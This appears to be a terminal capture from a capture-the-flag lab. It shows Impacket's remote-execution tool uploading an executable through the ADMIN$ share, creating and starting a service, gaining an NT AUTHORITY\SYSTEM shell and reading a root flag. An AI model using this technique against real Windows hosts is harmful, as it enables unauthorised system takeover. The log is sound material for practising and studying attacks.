Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.10.10.172.....
[*] Found writable share ADMIN$
[*] Uploading file nCuZVkrY.exe
[*] Opening SVCManager on 10.10.10.172.....
[*] Creating service lycw on 10.10.10.172.....
[*] Starting service lycw.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.914]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> type root.txt
affccf47...